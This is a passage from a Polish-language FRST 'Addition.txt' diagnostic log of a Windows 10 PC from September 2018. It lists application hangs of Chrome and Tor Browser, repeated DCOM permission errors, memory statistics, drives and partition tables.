Nie można odnaleźć zestawu zależnego Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="arm",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0".
Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę.

Error: (09/23/2018 11:41:26 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program chrome.exe w wersji 69.0.3497.100 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania.

Identyfikator procesu: 2494

Godzina rozpoczęcia: 01d4531e6ab69d0b

Godzina zakończenia: 4294967295

Ścieżka aplikacji: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Identyfikator raportu: 52dc12d5-e6ca-4e11-bf8a-193456129afc

Pełna nazwa pakietu powodującego błąd: 

Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (09/23/2018 05:45:41 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: Nie powiodło się wykonanie procedury otwierania dla usługi „BITS” w bibliotece DLL „C:\Windows\System32\bitsperf.dll”. Dane wydajności dla tej usługi nie będą dostępne. Pierwsze cztery bajty (DWORD) sekcji danych Data zawierają kod błędu.

Error: (09/23/2018 04:44:30 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program chrome.exe w wersji 69.0.3497.100 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania.

Identyfikator procesu: 1484

Godzina rozpoczęcia: 01d452e5cd111d93

Godzina zakończenia: 4294967295

Ścieżka aplikacji: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Identyfikator raportu: 58faeacd-9612-42b9-aac4-a8242c7376d5

Pełna nazwa pakietu powodującego błąd: 

Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (09/23/2018 04:35:05 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program firefox.exe w wersji 60.2.0.6609 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania.

Identyfikator procesu: 2af8

Godzina rozpoczęcia: 01d452e5d8f72e7c

Godzina zakończenia: 4294967295

Ścieżka aplikacji: E:\Pulpit\Tor Browser\Browser\firefox.exe

Identyfikator raportu: ddba33a4-0309-44a7-8a43-16818c9c091c

Pełna nazwa pakietu powodującego błąd: 

Identyfikator aplikacji względem pakietu powodującego błąd:


Dziennik System:
=============
Error: (09/23/2018 11:53:04 AM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-S8JMHL8)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 i identyfikatorem aplikacji APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 użytkownikowi DESKTOP-S8JMHL8\Ryuuku o identyfikatorze zabezpieczeń SID (S-1-5-21-2057919454-3684139494-2045405119-1001) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (09/23/2018 11:52:42 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 i identyfikatorem aplikacji APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (09/23/2018 11:52:42 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 i identyfikatorem aplikacji APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (09/23/2018 11:52:42 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 i identyfikatorem aplikacji APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (09/23/2018 11:52:42 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 i identyfikatorem aplikacji APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (09/23/2018 11:52:42 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 i identyfikatorem aplikacji APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (09/23/2018 11:52:42 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 i identyfikatorem aplikacji APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (09/23/2018 11:47:11 AM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-S8JMHL8)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 i identyfikatorem aplikacji APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 użytkownikowi DESKTOP-S8JMHL8\Ryuuku o identyfikatorze zabezpieczeń SID (S-1-5-21-2057919454-3684139494-2045405119-1001) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.


==================== Statystyki pamięci =========================== 

Procesor: Intel(R) Core(TM) i5-8600K CPU @ 3.60GHz
Procent pamięci w użyciu: 16%
Całkowita pamięć fizyczna: 16258.07 MB
Dostępna pamięć fizyczna: 13526.61 MB
Całkowita pamięć wirtualna: 19202.07 MB
Dostępna pamięć wirtualna: 15721.22 MB

==================== Dyski ================================

Drive c: () (Fixed) (Total:111.79 GB) (Free:72.96 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)]
Drive d: () (Fixed) (Total:499.55 GB) (Free:430.61 GB) NTFS
Drive e: () (Fixed) (Total:1363 GB) (Free:4.42 GB) NTFS
Drive f: (Magdallena) (Removable) (Total:14.44 GB) (Free:10.02 GB) NTFS

\\?\Volume{df1b242b-0000-0000-0000-00a3d1010000}\ () (Fixed) (Total:0.47 GB) (Free:0.08 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: B9C820CA)
Partition 1: (Active) - (Size=111.8 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: DF1B242B)
Partition 1: (Not Active) - (Size=1363 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=499.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=479 MB) - (Type=27)

========================================================
Disk: 2 (Size: 14.4 GB) (Disk ID: 19649F9B)
Partition 1: (Active) - (Size=14.4 GB) - (Type=07 NTFS)

==================== Koniec  Addition.txt ============================